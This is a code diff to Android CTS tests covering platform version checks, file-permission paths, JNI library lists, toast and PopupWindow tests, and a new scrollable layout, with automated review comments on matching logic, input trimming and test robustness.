diff --git a/tests/tests/os/Android.mk b/tests/tests/os/Android.mk
index 5397fc6a..4dc87b1 100644
--- a/tests/tests/os/Android.mk
+++ b/tests/tests/os/Android.mk
@@ -48,3 +48,34 @@
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
+
+# platform version check (b/32056228)
+# ============================================================
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := cts-platform-version-check
+LOCAL_MODULE_CLASS := ETC
+LOCAL_MODULE_TAGS := optional
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+
+cts_platform_version_path := cts/tests/tests/os/assets/platform_versions.txt
+cts_platform_version_string := $(shell cat $(cts_platform_version_path))
+
+include $(BUILD_SYSTEM)/base_rules.mk
+
+$(LOCAL_BUILT_MODULE) : $(cts_platform_version_path) build/core/version_defaults.mk
+ $(hide) if [ -z "$(findstring $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then \
+ echo "============================================================" 1>&2; \
+ echo "Could not find version \"$(PLATFORM_VERSION)\" in CTS platform version file:" 1>&2; \
+ echo "" 1>&2; \
+ echo " $(cts_platform_version_path)" 1>&2; \
+ echo "" 1>&2; \
+ echo "Most likely PLATFORM_VERSION in build/core/version_defaults.mk" 1>&2; \
+ echo "has changed and a new version must be added to this CTS file." 1>&2; \
+ echo "============================================================" 1>&2; \
+ exit 1; \
+ fi
+ @mkdir -p $(dir $@)
+ echo $(cts_platform_version_string) > $@
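Review bot: `$(findstring $(PLATFORM_VERSION),$(cts_platform_version_string))` is a substring test, so a PLATFORM_VERSION of `7.1` is accepted as soon as the file lists `7.1.1`, and `1.2` would match `7.1.2`. `$(shell cat ...)` already turns the file into a space-separated word list, so a whole-word match does what the error text describes: `if [ -z "$(filter $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then`. The final `echo $(cts_platform_version_string) > $@` writes all versions on one line, unlike the asset file it is derived from; a comment should say whether that is intended.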
diff --git a/tests/tests/os/assets/platform_versions.txt b/tests/tests/os/assets/platform_versions.txt
new file mode 100644
index 0000000..6f9c237
--- /dev/null
+++ b/tests/tests/os/assets/platform_versions.txt
@@ -0,0 +1,3 @@
+7.1
+7.1.1
+7.1.2
diff --git a/tests/tests/os/src/android/os/cts/BuildVersionTest.java b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
index e39249b..d06171b 100644
--- a/tests/tests/os/src/android/os/cts/BuildVersionTest.java
+++ b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
@@ -16,10 +16,16 @@
package android.os.cts;
+import android.content.res.AssetManager;
import android.os.Build;
import android.platform.test.annotations.RestrictedBuildTest;
+import android.support.test.InstrumentationRegistry;
import android.util.Log;
+import java.io.BufferedReader;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
@@ -29,17 +35,16 @@
public class BuildVersionTest extends TestCase {
private static final String LOG_TAG = "BuildVersionTest";
- private static final Set<String> EXPECTED_RELEASES =
- new HashSet<String>(Arrays.asList("7.1","7.1.1","7.1.2"));
private static final int EXPECTED_SDK = 25;
private static final String EXPECTED_BUILD_VARIANT = "user";
private static final String EXPECTED_TAG = "release-keys";
+ private static final String PLATFORM_VERSIONS_FILE = "platform_versions.txt";
@SuppressWarnings("deprecation")
@RestrictedBuildTest
public void testReleaseVersion() {
// Applications may rely on the exact release version
- assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, EXPECTED_RELEASES);
+ assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, getExpectedReleases());
assertEquals("Build.VERSION.SDK", "" + EXPECTED_SDK, Build.VERSION.SDK);
assertEquals("Build.VERSION.SDK_INT", EXPECTED_SDK, Build.VERSION.SDK_INT);
}
@@ -94,4 +99,20 @@
", should be one of: " + permittedValues);
}
}
+
+ private Set<String> getExpectedReleases() {
+ Set<String> expectedReleases = new HashSet<String>();
+ final AssetManager assets =
+ InstrumentationRegistry.getInstrumentation().getTargetContext().getAssets();
+ String line;
+ try (BufferedReader br =
+ new BufferedReader(new InputStreamReader(assets.open(PLATFORM_VERSIONS_FILE)))) {
+ while ((line = br.readLine()) != null) {
+ expectedReleases.add(line);
+ }
+ } catch (IOException e) {
+ fail("Could not open file " + PLATFORM_VERSIONS_FILE + " to run test");
+ }
+ return expectedReleases;
+ }
}
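Review bot: `getExpectedReleases()` adds each line of the asset verbatim, so a trailing space in `platform_versions.txt` produces an entry that can never equal `Build.VERSION.RELEASE`, and a blank line adds an empty permitted value. Normalise before adding: `line = line.trim(); if (!line.isEmpty()) expectedReleases.add(line);`. The `catch (IOException e)` drops the exception, so the message should carry it, `fail("Could not read " + PLATFORM_VERSIONS_FILE + ": " + e);`. The `InputStreamReader` should be given `StandardCharsets.UTF_8` explicitly rather than the platform default.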
diff --git a/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java b/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
index 277198e..575b35e 100644
--- a/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
+++ b/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
@@ -538,6 +538,7 @@
"/data/mdl",
"/data/misc",
"/data/misc/bluetooth",
+ "/data/misc/bluetooth/logs",
"/data/misc/dhcp",
"/data/misc/lockscreen",
"/data/misc/sensor",
diff --git a/tests/tests/security/Android.mk b/tests/tests/security/Android.mk
index f2b4470..96e095a 100644
--- a/tests/tests/security/Android.mk
+++ b/tests/tests/security/Android.mk
@@ -26,33 +26,13 @@
LOCAL_JAVA_LIBRARIES := android.test.runner org.apache.http.legacy
LOCAL_JNI_SHARED_LIBRARIES := libctssecurity_jni libcts_jni libnativehelper_compat_libc++ \
- libnativehelper \
- libbinder \
- libutils \
- libmedia \
- libselinux \
- libcutils \
- libcrypto \
- libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
- libpcre \
- libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+ libnativehelper \
+ libcutils \
+ libcrypto \
+ libselinux \
+ libc++ \
+ libpcre \
+ libpackagelistparser
LOCAL_SRC_FILES := $(call all-java-files-under, src)\
src/android/security/cts/activity/ISecureRandomService.aidl\
diff --git a/tests/tests/security/jni/Android.mk b/tests/tests/security/jni/Android.mk
index d39ac7e..cbfbe3a 100644
--- a/tests/tests/security/jni/Android.mk
+++ b/tests/tests/security/jni/Android.mk
@@ -31,37 +31,16 @@
android_security_cts_MMapExecutableTest.cpp \
android_security_cts_EncryptionTest.cpp \
-LOCAL_C_INCLUDES := $(JNI_H_INCLUDE) \
- $(TOP)/frameworks/native/include/media/openmax
-
-LOCAL_SHARED_LIBRARIES := libnativehelper \
+LOCAL_SHARED_LIBRARIES := \
+ libnativehelper \
liblog \
- libutils \
- libmedia \
- libselinux \
- libdl \
libcutils \
libcrypto \
+ libselinux \
libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
libpcre \
libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+
LOCAL_C_INCLUDES += ndk/sources/cpufeatures
LOCAL_STATIC_LIBRARIES := cpufeatures
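Review bot: The rewritten `LOCAL_SHARED_LIBRARIES` list ends with `libpackagelistparser \` and relies on the added blank line to terminate the continuation. If that blank line is ever removed, `LOCAL_C_INCLUDES += ndk/sources/cpufeatures` is folded into the library list without any parse error. Drop the trailing backslash on the last entry.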
diff --git a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
index 207e6ea..c2ecb3a 100644
--- a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
+++ b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
@@ -108,7 +108,10 @@
}
@Test
- public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ public void testAddTwoToastsViaAddingWindowApisWhenUidNotFocusedQuickly() throws Exception {
+ // Finish the activity so the UID loses focus
+ finishActivity(false);
+
try {
showToastsViaAddingWindow(2, false);
Assert.fail("Only one custom toast window at a time should be allowed");
@@ -120,6 +123,14 @@
}
@Test
+ public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ showToastsViaAddingWindow(2, false);
+
+ // Wait for the toast to timeout
+ waitForToastTimeout();
+ }
+
+ @Test
public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedSlowly() throws Exception {
// Add one window
showToastsViaAddingWindow(1, true);
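Review bot: The re-added `testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly` has no assertion; it passes only because `showToastsViaAddingWindow(2, false)` does not throw, which is the opposite expectation from the not-focused variant in the previous hunk. A comment should state the rule being pinned, for example `// A focused UID may add a second toast window; this must not throw.`, so that a later reader does not take the missing `Assert.fail` for an oversight. The helper `showToastsViaAddingWindow` and the exception type caught in the not-focused test are outside these hunks.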
diff --git a/tests/tests/widget/res/layout/popup_window_scrollable.xml b/tests/tests/widget/res/layout/popup_window_scrollable.xml
new file mode 100644
index 0000000..aa1edd6
--- /dev/null
+++ b/tests/tests/widget/res/layout/popup_window_scrollable.xml
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<ScrollView
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <RelativeLayout
+ android:id="@+id/main_container"
+ android:layout_width="10000dp"
+ android:layout_height="10000dp">
+
+ <View
+ android:id="@+id/anchor_upper_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_middle_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_lower_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ </RelativeLayout>
+
+</ScrollView>
\ No newline at end of file
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index 47efffc..918a161 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -16,6 +16,14 @@
package android.widget.cts;
+import static org.mockito.Matchers.anyInt;
+import static org.mockito.Mockito.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
import android.app.Activity;
import android.app.Instrumentation;
import android.content.Context;
@@ -44,13 +52,6 @@
import android.widget.TextView;
import android.widget.cts.R;
-import static org.mockito.Mockito.any;
-import static org.mockito.Mockito.mock;
-import static org.mockito.Mockito.never;
-import static org.mockito.Mockito.times;
-import static org.mockito.Mockito.verify;
-import static org.mockito.Mockito.when;
-
public class PopupWindowTest extends
ActivityInstrumentationTestCase2<PopupWindowCtsActivity> {
private Instrumentation mInstrumentation;
@@ -772,7 +773,19 @@
WindowManager.LayoutParams.FLAG_ALT_FOCUSABLE_IM & p.flags);
}
- public void testEnterExitTransition() {
+ public void testEnterExitTransitionAsDropDown() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ }
+
+ public void testEnterExitTransitionAtLocation() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAtLocation(anchorView, Gravity.BOTTOM, 0, 0));
+ }
+
+ private void verifyEnterExitTransition(Runnable showRunnable) throws Throwable {
TransitionListener enterListener = mock(TransitionListener.class);
Transition enterTransition = new BaseTransition();
enterTransition.addListener(enterListener);
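Review bot: The `throws Throwable` clause on `testEnterExitTransitionAsDropDown`, `testEnterExitTransitionAtLocation` and `verifyEnterExitTransition` looks unnecessary. The replaced `testEnterExitTransition()` declared no exceptions, and the only body change visible in the next hunk is `mInstrumentation.runOnMainSync(showRunnable);`, which adds no checked exception. Keeping the signatures as narrow as the original would read `private void verifyEnterExitTransition(Runnable showRunnable) {`, and likewise for the two tests. The helper would also benefit from a one-line contract comment such as `// showRunnable is executed on the main thread and must show mPopupWindow`. The helper's body continues past the end of this hunk, so this assumes nothing further down needs the broader clause.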
@@ -791,8 +804,7 @@
verify(exitListener, never()).onTransitionStart(any(Transition.class));
verify(dismissListener, never()).onDismiss();
- final View anchorView = mActivity.findViewById(R.id.anchor_upper);
- mInstrumentation.runOnMainSync(() -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ mInstrumentation.runOnMainSync(showRunnable);
mInstrumentation.waitForIdleSync();
verify(enterListener, times(1)).onTransitionStart(any(Transition.class));
verify(exitListener, never()).onTransitionStart(any(Transition.class));
@@ -1069,6 +1081,30 @@
assertEquals(LayoutParams.MATCH_PARENT, p.height);
}
+ public void testPositionAfterParentScroll() {
+ View.OnScrollChangeListener scrollChangeListener = mock(
+ View.OnScrollChangeListener.class);
+
+ getInstrumentation().runOnMainSync(() -> {
+ mActivity.setContentView(R.layout.popup_window_scrollable);
+
+ View anchor = mActivity.findViewById(R.id.anchor_upper);
+ PopupWindow window = createPopupWindow();
+ window.showAsDropDown(anchor);
+ });
+
+ getInstrumentation().runOnMainSync(() -> {
+ View parent = mActivity.findViewById(R.id.main_container);
+ parent.scrollBy(0, 500);
+ parent.setOnScrollChangeListener(scrollChangeListener);
+ });
+
+ getInstrumentation().waitForIdleSync();
+
+ verify(scrollChangeListener, never()).onScrollChange(
+ any(View.class), anyInt(), anyInt(), anyInt(), anyInt());
+ }
+
private static class BaseTransition extends Transition {
@Override
public void captureStartValues(TransitionValues transitionValues) {}
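Review bot: `testPositionAfterParentScroll` can pass vacuously, because nothing checks that `parent.scrollBy(0, 500)` actually moved the container. If `main_container` cannot scroll on a given device (for example, content shorter than the viewport), the `never()` verification holds trivially. Adding `assertTrue(mActivity.findViewById(R.id.main_container).getScrollY() > 0);` after `waitForIdleSync()` would pin that precondition on the test thread. The reason the listener is attached only after `scrollBy` also deserves a comment, presumably `// Attach after the initial scroll so only a re-scroll triggered by popup repositioning is observed`. The local `window` is never dismissed in this test; whether teardown covers it is not visible in this hunk.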